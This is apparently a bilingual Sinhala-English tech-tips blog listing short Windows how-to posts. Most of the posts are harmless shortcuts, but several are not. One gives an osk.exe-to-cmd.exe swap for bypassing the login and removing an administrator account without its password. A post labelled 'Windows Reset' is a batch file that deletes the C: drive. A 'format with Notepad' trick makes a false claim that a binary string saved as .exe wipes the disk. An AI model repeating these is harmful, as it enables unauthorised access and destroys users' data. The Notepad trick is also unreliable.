Posts

මුරපදයකින් තොරව වින්ඩෝස් 10 හි පරිපාලක ගිණුම ඉවත් කරන්නේ කෙසේද? How to remove administrator account in Windows 10 without password?

 මුරපදයකින් තොරව වින්ඩෝස් 10 හි පරිපාලක ගිණුම ඉවත් කරන්නේ කෙසේද? How to remove administrator account in Windows 10 without password? මුරපදය නොමැතිව වින්ඩෝස් 10 වෙතින් පරිපාලක ගිණුම මකා දැමීමට පහත පියවර අනුගමනය කරන්න. Follow the steps below to delete administrator account from Windows 10 without password: 01. ඔබේ පරිගණකය වින්ඩෝස් 10 සැකසුමකින් හෝ ප්‍රතිසාධන තැටියෙන් ආරම්භ කරන්න. Boot your computer from a Windows 10 setup or recovery disk. 02. වින්ඩෝස් ස්ථාපන තිරයට ගිය විට, "Shift + F10" ඔබන්න. When goes to the Windows installation screen, press "Shift + F10". bring up command prompt 03. Use the following command to replace "osk.exe" with "cmd.exe". osk.exe" වෙනුවට "cmd.exe" වෙනුවට පහත විධානය භාවිතා කරන්න. d:\ cd windows\system32 copy cmd.exe cmd.exe.ori copy osk.exe osk.exe.ori del osk.exe ren cmd.exe osk.exe 04.ඉහත විධානය ක්‍රියාත්මක කිරීමෙන් පසු මාධ්‍ය උපාංගය ඉවත් කරන්න, සහ විධානය සමඟ පරිගණකය නැවත අරඹන්න: shutdown -rt 00. After ru...

"වින්ඩෝස් 10 සෙවුම් තීරුවේ ටයිප් කළ නොහැක" එය සැකසීම. FIX: Cannot type in Windows 10 Search bar.

"වින්ඩෝස් 10 සෙවුම් තීරුවේ ටයිප් කළ නොහැක" එය සැකසීම. FIX: Cannot type in Windows 10 Search bar. CTF Loader (ctfmon.exe) ධාවනය කරන්න. CTF Loader (ctfmon.exe) යනු නීත්‍යානුකූල වින්ඩෝස් ක්‍රියාවලියකි (ctfmon.exe), එය පරිශීලක ආදානය සහ භාෂා තීරුව පාලනය කරයි. සමහර අවස්ථාවලදී, 'ctfmon.exe' ක්‍රියාවලිය නිසියාකාරව ක්‍රියාත්මක නොවිය හැකි අතර නැවත ආරම්භ කළ යුතුය. නැවත ආරම්භ කිරීම සඳහා, CTF Loader (ctfmon.exe) ක්‍රියාවලිය: Run CTF Loader (ctfmon.exe). The CTF Loader (ctfmon.exe), is a legitimate Windows process (ctfmon.exe), which controls the User Input and the Language bar. In some cases, the 'ctfmon.exe' process may not function properly and must be started again. To restart, the CTF Loader (ctfmon.exe) process: 1. එකවර run command box විවෘත කිරීම සඳහා වින්ඩෝස් key + R යතුරු ඔබන්න Simultaneously press the Windows image+ R keys to open run command box. 2. ක්‍රියාත්මක විධාන කොටුව තුළ, පහත විධානය පිටපත් කර Enter යතුර ඔබන්න: In run command box, copy paste the below comman...

windows 10 හී sticky notes open කරන ආකාරය. ( Open the Sticky Notes App in windows 10. )

windows 10 හී sticky notes open කරන ආකාරය. ( Open the Sticky Notes App in windows 10. ) වින්ඩෝස් 10 හි, start බොත්තම ක්ලික් කරන්න, සහ "Sticky notes" ටයිප් කරන්න.  On Windows 10, click or tap the Start button, and type "Sticky Notes". Sticky Notes will open where you left them. ඔබගේ යෙදුම් ලැයිස්තුවේ sticky notes නොපෙනේ නම්, Microsoft Store යෙදුම විවෘත කර "Microsoft Sticky Notes" ස්ථාපනය කරන්න. If you do not see Sticky Notes in your list of apps, open the Microsoft Store app and install "Microsoft Sticky Notes". 🔆පොස්ටුව හොදනම් යාලුවන්ට share කරන්න.ඔබගේ අදහස් පහතින් comment කරන්න.අපගේ telegram චැනලය,facebook පිටුවට,twitter පිටුවට හා whatsapp group එකට එකතු වන්න.ස්තුතියි. 🔆Don’t forget to share this post with your friends and leave a comment below. join our telegram channel,facebook page,twitter page and whatsapp group.Thank you. Follow us.👇 Telegram Facebook Twitter Whatsapp group 01 Whatsapp group 02

නිවැරදි මුරපදය ඇතුලත් කල විට පමණක් අදාල ඇප් run වෙන vbs software එකක්.OPEN A PROGRAM IF PASSWORD IS CORRECT)

නිවැරදි මුරපදය ඇතුලත් කල විට පමණක් අදාල ඇප් run වෙන vbs software එකක්.OPEN A PROGRAM IF PASSWORD IS CORRECT) පහත ඇති code එක copy කර ඔබගේ Notepad එකතුල past කරන්න..( Copy and paste the following into Notepad...) Set shell=CreateObject("wscript.shell") pass=inputbox("Enter a Password") if pass="1234" then Shell.Run("Notepad.exe") else msgbox("Incorrect Password!") මෙම code එකතුල පාස්වර්ඩ් එක 1234 වේ. ඔබට අවශය කැමති පාස්වර්ඩ් එකක් එතනට යෙදිය හැක. වරහන් ඇතුලේ ඇති Notepad.exe යනු open වෙන වැඩසටහනයි. එතනට අවශය වැඩසටහනක් ඔබට යෙදිය හැක. The password for this code is 1234. You can enter any password you want there. Notepad.exe in parentheses is the program that opens. There you can apply any program you want. සටහන(NOTE): THIS IDEA WAS FROM NOTEPADCODES1, BUT I DID NOT USE ANY HELP OR "WHAT TO DO" ON IT! මෙම IDEA එක NOTEPADCODES1 වෙතින් විය, නමුත් මම කිසිම උදව්වක් හෝ "කුමක් කළ යුතුද" යන්න භාවිතා කර නැත! 🔆පොස්ටුව හොද...

CMD හි කෙටිමං යතුරූ F1 සිට F9 දක්වා. ( F1 to F9 Keys are Shortcuts in CMD )

CMD හි කෙටිමං යතුරූ F1 සිට F9 දක්වා. ( F1 to F9 Keys are Shortcuts in CMD ) 🔆F1:ඔබගේ අවසාන විධාන ලිපිය අකුරින් නැවත ටයිප් කිරීමට Tap or hold this key to retype your last command letter by letter. 🔆F2: වත්මන් විධානය නිශ්චිත අක්ෂරයකට පිටපත් කරයි. Copies the current command up to a specified character. 🔆F3: පෙර පේළිය නැවත ටයිප් කරයි. Retypes the entire previous line 🔆F4: නිශ්චිත විධානයක් දක්වා වත්මන් විධානය ස්වයංක්‍රීයව මකා දමයි. Auto-deletes the current command up to a specified character. 🔆F5:F3 ට සමාන නමුත් පෙර විධාන හරහා චක්‍රීය කිරීමට ඔබට ඉඩ සලසයි. Similar to F3, but lets you cycle through previous commands. 🔆F6: EOF දර්ශකය CMD වෙත ඇතුල් කරයි. Enters the EOF indicator into CMD. 🔆F7:කලින් ඇතුළත් කළ විධාන ලැයිස්තුවක් විවෘත කරයි. Opens a list of previously entered commands. 🔆F8: F5 ට සමාන නමුත් සැසිය තුළ ඔබගේ විධාන ඉතිහාසය අවසානයේ නතර නොවේ. ඒ වෙනුවට, එය ආරම්භය දක්වාම ගමන් කරයි. Similar to F5, but doesn’t stop at the end of your command history in the session. Instead, it ...

Command line භාවිතා කර file encrypt කරන ආකාරය.( To encrypt files from command line )

Command line භාවිතා කර file encrypt කරන ආකාරය.( To encrypt files from command line ) 🔥තනි ගොනුවක් encryption කිරීම සඳහා ඔබට පහත විධානය ක්‍රියාත්මක කළ හැකිය. ( To perform encryption on a single file you can run the below command. )👇 cipher /A /E filename 🔥ගොනු කිහිපයක් encryption කිරීම සදහා ඔබට පහත විධානය භාවිතා කල හැක. ( To perform encryption on a list of files. )👇 cipher /A /E filename1 filename2 filename3 🔥encrypt කල ගොනු decrypt කිරීමට ඔබට මෙම කේතය භාවිතා කල හැක. ( To decrypt a file. )👇 cipher /D fileName 🔆පොස්ටුව හොදනම් යාලුවන්ට share කරන්න.ඔබගේ අදහස් පහතින් comment කරන්න.අපගේ telegram චැනලය,facebook පිටුවට,twitter පිටුවට හා whatsapp group එකට එකතු වන්න.ස්තුතියි. 🔆Don’t forget to share this post with your friends and leave a comment below. join our telegram channel,facebook page,twitter page and whatsapp group.Thank you. Follow us.👇 Telegram Facebook Twitter Whatsapp group 01 Whatsapp group 02

Device manager open කිරීමට run command භාවිතා කරමු. Open Device Manager useing run command.

Device manager open කිරීමට run command භාවිතා කරමු. Open Device Manager useing run command. අප මෙයට භාවිතා කරන run command එක නම්( run command ),👇 devmgmt.msc ඔබගේ දෘඩාංග සංරචක සහ ඒවායේ ධාවක සම්බන්ධ සියල්ල කළමනාකරණය කිරීමට උපාංග කළමනාකරු ස්ථානයකි. ඔබට දෘඩාංග සංරචක සක්‍රිය / අබල කළ හැකිය. අස්ථාපනය කිරීම හෝ යාවත්කාලීන කිරීම වැනි ඔවුන්ගේ ධාවක කළමනාකරණය කරන්න. windows key +R එක වර press කර run box එක ලබා ගන්න. මෙය run box එක තුල type කර enter ඔබන්න. Device Manager is place to manage everything related to your hardware components and their drivers. You can enable/disable hardware components. Manage their drivers, like uninstalling or updating them. type this command and press enter. පොස්ටුව හොදනම් යාලුවන්ට share කරන්න.ඔබගේ අදහස් පහතින් comment කරන්න.අපගේ telegram චැනලය,facebook පිටුවට,twitter පිටුවට හා whatsapp group එකට එකතු වන්න.ස්තුතියි. Don’t forget to share this post with your friends and leave a comment below. join our telegram channel,facebook page,twitter page and whatsapp gro...

ඔබේ පරිගණකයේ වැඩසටහන් uninstall කිරීමට run command භාවිතා කරන ආකාරය.Uninstall program in your computer use run command.

ඔබේ පරිගණකයේ වැඩසටහන් uninstall කිරීමට run command භාවිතා කරන ආකාරය.Uninstall program in your computer use run command. මෙම කාර්යය ඉටු කරගැනීමට අප මෙම run command එක භාවිතා කරයි. We use this run command to accomplish this task. run command - appwiz.cpl ඔබේ පරිගණකයේ appwiz.cpl විධානය භාවිතා කිරීමට, To use the appwiz.cpl command on your computer, පියවර 01: - ඔබේ යතුරුපුවරුවේ වින්ඩෝස් යතුර () + R එකවරම ඔබන්න. step 01 :- press the Windows Key ( ) + R on your keyboard at the same times. පියවර 02: - මෙම කොටුවේ, appwiz.cpl ටයිප් කර OK ක්ලික් කරන්න. step 02 :- In this box, type appwiz.cpl then click OK. මෙය ඔබගේ පරිගණකයේ දැනට ස්ථාපනය කර ඇති වැඩසටහන් ලැයිස්තුවක් විවෘත කරනු ඇත. අවශ්‍ය පරිදි අනවශ්‍ය වැඩසටහන් අස්ථාපනය කිරීම සඳහා ඔබට තේරීම් කළ හැකිය. This will open your list of currently installed programs on your computer. where you can make selections to uninstall unwanted programs as needed. 🔆පොස්ටුව හොදනම් යාලුවන්ට share කරන්න.ඔබගේ අදහස් පහතින් comment කරන්න.අපගේ telegram චැනලය,facebook පි...

මෑතකදී සංවෘත කල ටැබ් එකක් නැවත විවෘත කරන්න.( Reopen a Closed Tab )

මෑතකදී සංවෘත කල ටැබ් එකක් නැවත විවෘත කරන්න.( Reopen a Closed Tab ) 🔆ඔබ අන්තර්ජාලයේ සැරිසරමින් අහම්බෙන් ටැබ් එකක් වසා දැමුවා. Ctrl + Shift + T (Windows) හෝ Cmd + Shift + T (Mac) එබීමෙන් ඔබට එය ඉක්මනින් ආපසු විවෘත කරගත හැකිය. එය මෑතකදී වසා දැමූ ටැබ් එක නැවත විවෘත කර ඔබ කලින් කළ දේ වෙත ඔබව ගෙන යනු ඇත. 🔆you were browsing the internet and accidentally close a tab. You can quickly brings it back by pressing Ctrl + Shift + T (Windows) or Cmd + Shift + T (Mac). It will be reopen the most recently closed tab and get you back to what you were doing before. 🔆පොස්ටුව හොදනම් යාලුවන්ට share කරන්න.ඔබගේ අදහස් පහතින් comment කරන්න.අපගේ telegram චැනලය,facebook පිටුවට,twitter පිටුවට හා whatsapp group එකට එකතු වන්න.ස්තුතියි. 🔆Don’t forget to share this post with your friends and leave a comment below. join our telegram channel,facebook page,twitter page and whatsapp group.Thank you. 🔆Follow us.👇 Telegram Facebook Twitter Whatsapp group 01 Whatsapp group 02

දෘඩ තැටියේ කිසිදු ප්‍රයෝජනයක් නොමැති ගොනු සොයා ඉවත් කිරීම.( Clean Disk Drive )

දෘඩ තැටියේ කිසිදු ප්‍රයෝජනයක් නොමැති ගොනු සොයා ඉවත් කිරීම.( Clean Disk Drive ) 🔆Disk clean up යනු මයික්‍රොසොෆ්ට් වින්ඩෝස් හි ඇතුළත් පරිගණක නඩත්තු උපයෝගීතාවයකි. පරිගණක දෘඩ තැටියේ තැටි ඉඩ නිදහස් කිරීමට නිර්මාණය කර ඇත. දෘඩ තැටිය තුල කිසිදු ප්‍රයෝජනයක් නොමැති ගොනු දෘඩතැටියේ සෙවීම සහ විශ්ලේෂණය කිරීම සිදුකර, පසුව අනවශ්‍ය ගොනු මකා දැමීම. 🔆Disk Clean up is a computer maintenance utility included in Microsoft Windows. Designed to free up disk space on computer hard drive. The utility first searches and analyzes the hard drive for file that are no longer of any use, and then delete the unnecessary files. මෙම පියව අනුගමනය කරන්න.(Follow this steps)👇 start menu Search Disk Cleanup Choose your desired Drive tick all the options and clean 🔆පොස්ටුව හොදනම් යාලුවන්ට share කරන්න.ඔබගේ අදහස් පහතින් comment කරන්න.අපගේ telegram චැනලය,facebook පිටුවට,twitter පිටුවට හා whatsapp group එකට එකතු වන්න.ස්තුතියි. 🔆Don’t forget to share this post with your friends and leave a comment below. join our telegram...

වින්ඩොස් reset කිරීමට notepad file එකක් සකසමු. ( Windows Reset )

වින්ඩොස් reset කිරීමට notepad file එකක් සකසමු. ( Windows Reset useing notepad file ) 🔆මෙය ක්‍රියා කිරීම මගින් මැකීයන දත්ත recovery කල නොහැක. මෙම code එක කොපි කර ඔබේ පරිගණකයේ notepad එකට past කර ඔබ කැමතිනමක් දී save කරන්න. නමේ අගට.bat ලෙස දෙන්න. උදා;- reset.bat 🔆This will delete your whole C:\ drive and it really unrecoverable. coppy code and past your computer notepad application and save it.file extension is .bat ex :- rest.bat Code: • @Echo off • Del C:\ *.* |y 🔆පොස්ටුව හොදනම් යාලුවන්ට share කරන්න.ඔබගේ අදහස් පහතින් comment කරන්න.අපගේ telegram චැනලය,facebook පිටුවට,twitter පිටුවට හා whatsapp group එකට එකතු වන්න.ස්තුතියි. 🔆Don’t forget to share this post with your friends and leave a comment below. join our telegram channel,facebook page,twitter page and whatsapp group.Thank you. 🔆Follow us.👇 Telegram Facebook Twitter Whatsapp group 01 Whatsapp group 02

ඔබේ windows පරිගණකයේ emoji keyboard එක open කරන ආකාරය. ( How to open Emoji keyboard in your computer.)

ඔබේ windows පරිගණකයේ emoji keyboard එක open කරන ආකාරය. How to open Emoji keyboard in your computer. 🔆ඔබට කරන්න තින්නේ ඉතා සුලුදෙයකි. මෙම පහතින් ඇති key ටික press කිරීම පමණි. windows පරිගණක වල 👇 windows key+. ( වින්ඩොස් කී එක සමග . සලකුන හා සලකුන ඇති බොත්තම් පිලිවෙලට ඔබන්න. මුලින් වින්ඩොස් කී එක පසුව අනෙක් එක.) මෙලෙස එබූ විට පැත්තෙන් emoji keyboard එක open වේ. macos වල👇 cmd+control+spacebar (වින්ඩොස් වල වගේම ඔය කී ටික පිලිවෙලට ඔබන්න. 🔆If you're addicted to using emoji, know desktop OS support them natively just like mobiles do. On Windows press the Windows Key + . (period) and on macOS Cmd + Control + Spacebar. An Emoji panel will appear so you can carry on as usual using all the expressions you want. 🔆පොස්ටුව ඔබේ යහලුවන් සමග share කරන්න.ඔබේ අදහස් පහතින් comment කරන්න.අපගේ telegram සමූහය,facebook පිටුව,twitter පිටුව,whatsapp group හා එකතු වන්න.ස්තුතියි. 🔆Don’t forget to share this post with your friends and leave a comment below. join our telegram channel,facebook page,...

POWERCFG විධානය භාවිතා කරමින් වින්ඩෝස් 10 බැටරි වාර්තාව ජනනය කිරීම.Generate Windows 10 Battery Report using POWERCFG command

POWERCFG විධානය භාවිතා කරමින් වින්ඩෝස් 10 බැටරි වාර්තාව ජනනය කිරීම.( Generate Windows 10 Battery Report using POWERCFG command) 💥 Step මෙම පියවර අනුගමනය කරන්න.( Follow this steps.) Step 01 :- CMD විවෘත කරන්න.(Open CMD in Admin Mode as above.) Step 02:- විධානය ටයිප් කරන්න. (Type the command)👇                                       powercfg /batteryreport Step 03:-Enter ඔබන්න. ( Press Enter) 💥Report බැටරි වාර්තාව බැලීමට වින්ඩෝස් + ආර් ඔබා පහත ස්ථානය ටයිප් කරන්න.( To view the Battery Report, press Windows+R and type the following location):👇  C:\WINDOWS\system32\battery-report.html  💥Ok හරි ක්ලික් කරන්න. මෙම ගොනුව ඔබගේ වෙබ් බ්‍රව්සරයේ විවෘත වේ. (Click Ok. This file will open in your web browser.) බලශක්ති වාර්තාවේ දැනට පවතින අනුවාදයන් සහ බැටරි වාර්තාව ඇතුළුව බැටරි සෞඛ්‍යය පරීක්ෂා කිරීම සඳහා ඔබ CMD කවුළුව තුළ POWERCFG විධානයන් ටයිප් කරන සෑම අවස්ථාවකම මෙම දත්ත නැ...

Set Timer To Shut Down

Set Timer To Shut Down 💥If you want to impress your friends by the automatic shutdown in your set time then follow below steps. Step: 1 Open your desktop homepage then right-click New Menu and click the shortcut. Step: 2 Now new pop up window of shortcut will open where type below command. shutdown -s -t 120 💥Note: 120 is the second means 2 min, you can change as per you want. Step: 3 After you type click on next and then finish. Step: 4 Now you will see the shortcut icon is created on your desktop computer click on that so it will activate and automatically shut down your computer as per your time is given. 🔆Don’t forget to share this post with your friends and leave a comment below. join our telegram channel,facebook page,twitter page and whatsapp group.Thank you. 🔆Follow us.👇 Telegram Facebook Twitter Whatsapp group 01 Whatsapp group 02

Turn on gaming mode in your computer.

Turn on gaming mode in your computer. 🔆If you are someone who constantly faces drops and lags while playing games on your Windows PC then the Game Mode on Windows 10 can help you to improve your Gaming Performance. 🔆Follow this steps.👇 💥Step 01:-Go to Settings Gaming Game Mode 💥Step 02:- turn on Game Mode. 🔆Don’t forget to share this post with your friends and leave a comment below. join our telegram channel,facebook page,twitter page and whatsapp group.Thank you. 🔆Follow us.👇 Telegram Facebook Twitter Whatsapp group 01 Whatsapp group 02

Enable Dark Mode on Windows 10

Enable Dark Mode on Windows 10 🔆The dark mode helps you to reduce eye strain and in addition to this, it also helps to save the battery life on your laptops. To enable Dark Mode in Windows 10 all you have to do is:- 💥Step 1: Go to Settings - Personalisation - Colors. 💥Step 2: From the “Choose your color” section select “Dark” to turn on Dark Mode on your Windows 10 system. 🔆Don’t forget to share this post with your friends and leave a comment below. join our telegram channel,facebook page,twitter page and whatsapp group.Thank you. 🔆Follow us.👇 Telegram Facebook Twitter Whatsapp group 01 Whatsapp group 02

Open apps on your Taskbar with keyboard shortcuts

Open apps on your Taskbar with keyboard shortcuts 💥If you've pinned programs to your Taskbar at the bottom of your screen to create a shortcut, you don't have to click the icons to open them. Instead, use the keyboard shortcut Windows key + [Number key], with the number key corresponding to the position of the program on the Taskbar. 🔆For example, Windows key + 2 will open the second item on the Taskbar. 💥Don’t forget to share this post with your friends and leave a comment below. join our telegram channel,facebook page,twitter page and whatsapp group.Thank you. ⏩Follow us.👇 Telegram Facebook Twitter Whatsapp group 01 Whatsapp group 02

Format Hard Disk Using Just Notepad

Format Hard Disk Using Just Notepad 💥Read the post before try this trick.💥 💥💥💥💥This code will delete all your hard drive data.💥💥💥💥 ⭕This code will delete all your hard drive data. Just copy the below code and paste in notepad and save it as “anyname.exe”. 01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000 🔆Don’t forget to share this post with your friends and leave a comment below. join our telegram channel,facebook page,twitter page and whatsapp group.Thank you. ⏩Follow us.👇 Telegram Facebook Twitter Whatsapp group 01 Whatsapp group 02

Take a screenshot in computer

Take a screenshot in computer. 💥If you want to capture and save a picture of your entire screen, the easiest way is to hit the Windows key + Print Screen key, and that picture will be saved to the Pictures Screenshots folder. 💥To capture just one part of your screen, hit the Windows key + Shift + S to open a tool called Snip Sketch, which allows you to click and drag to create a screenshot, which is saved to your Clipboard. 💥Don’t forget to share this post with your friends and leave a comment below. join our telegram channel,facebook page,twitter page and whatsapp group.Thank you. ⏩Follow us.👇 Telegram Facebook Twitter Whatsapp group 01 Whatsapp group 02

Scan system files for problems

Scan system files for problems 💥The sfc /scannow command runs a system file checker tool that scans Windows system files and looks for problems. If some files are missing or corrupted, this command fixes them. 💥Open your computer command prompt. 💥Type this code👇. press enter. sfc /scannow 💥Don’t forget to share this post with your friends and leave a comment below. join our telegram channel,facebook page,twitter page and whatsapp group.Thank you. ⏩Follow us.👇 Telegram Facebook Twitter Whatsapp group 01 Whatsapp group 02